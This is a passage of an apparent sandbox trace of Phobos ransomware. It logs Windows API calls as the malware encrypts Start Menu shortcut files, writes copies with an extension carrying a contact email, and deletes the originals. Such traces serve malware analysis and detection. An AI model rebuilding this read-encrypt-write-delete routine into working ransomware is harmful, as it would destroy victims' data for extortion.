dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.375] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.376] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.376] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.377] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.377] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.377] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x532, lpOverlapped=0x0) returned 1 [0177.383] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x540, dwBufLen=0x540 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x540) returned 1 [0177.383] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x540, lpOverlapped=0x0) returned 1 [0177.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0177.383] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.383] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0177.383] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.383] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0177.384] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.384] CloseHandle (hObject=0x188) returned 1 [0177.384] CloseHandle (hObject=0x180) returned 1 [0177.384] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk")) returned 1 [0177.385] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.388] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1352) returned 1 [0177.388] CloseHandle (hObject=0x180) returned 1 [0177.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk")) returned 0x20 [0177.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.388] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.388] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.389] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.389] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x548, lpOverlapped=0x0) returned 1 [0177.409] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0177.409] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0177.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.410] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.410] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.410] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.410] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.410] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.410] CloseHandle (hObject=0x180) returned 1 [0177.410] CloseHandle (hObject=0x188) returned 1 [0177.410] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows anytime upgrade.lnk")) returned 1 [0177.412] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.412] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.412] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1326) returned 1 [0177.412] CloseHandle (hObject=0x188) returned 1 [0177.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk")) returned 0x20 [0177.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.412] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.412] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.413] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.413] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.413] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.413] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.413] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x52e, lpOverlapped=0x0) returned 1 [0177.425] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530, dwBufLen=0x530 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530) returned 1 [0177.426] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x530, lpOverlapped=0x0) returned 1 [0177.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.427] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.427] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.427] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.427] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.427] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.427] CloseHandle (hObject=0x188) returned 1 [0177.427] CloseHandle (hObject=0x180) returned 1 [0177.427] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows dvd maker.lnk")) returned 1 [0177.429] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.429] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.429] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1210) returned 1 [0177.429] CloseHandle (hObject=0x180) returned 1 [0177.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk")) returned 0x20 [0177.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.434] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.434] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.435] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.435] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ba, lpOverlapped=0x0) returned 1 [0177.436] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4c0) returned 1 [0177.436] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4c0, lpOverlapped=0x0) returned 1 [0177.437] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.437] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.437] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.437] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.437] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.437] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.437] CloseHandle (hObject=0x180) returned 1 [0177.437] CloseHandle (hObject=0x188) returned 1 [0177.437] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows fax and scan.lnk")) returned 1 [0177.438] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.438] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.439] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1547) returned 1 [0177.439] CloseHandle (hObject=0x188) returned 1 [0177.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk")) returned 0x20 [0177.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.439] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.439] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.441] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.441] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.441] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x60b, lpOverlapped=0x0) returned 1 [0177.442] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610, dwBufLen=0x610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610) returned 1 [0177.442] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x610, lpOverlapped=0x0) returned 1 [0177.444] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.444] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.444] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.444] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.444] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.444] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.444] CloseHandle (hObject=0x188) returned 1 [0177.444] CloseHandle (hObject=0x180) returned 1 [0177.444] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\windows media player.lnk")) returned 1 [0177.446] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.447] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1246) returned 1 [0177.447] CloseHandle (hObject=0x180) returned 1 [0177.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk")) returned 0x20 [0177.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.447] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.447] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.447] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.447] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.449] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.449] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.449] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4de, lpOverlapped=0x0) returned 1 [0177.458] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0177.458] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0177.459] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.459] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.459] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, 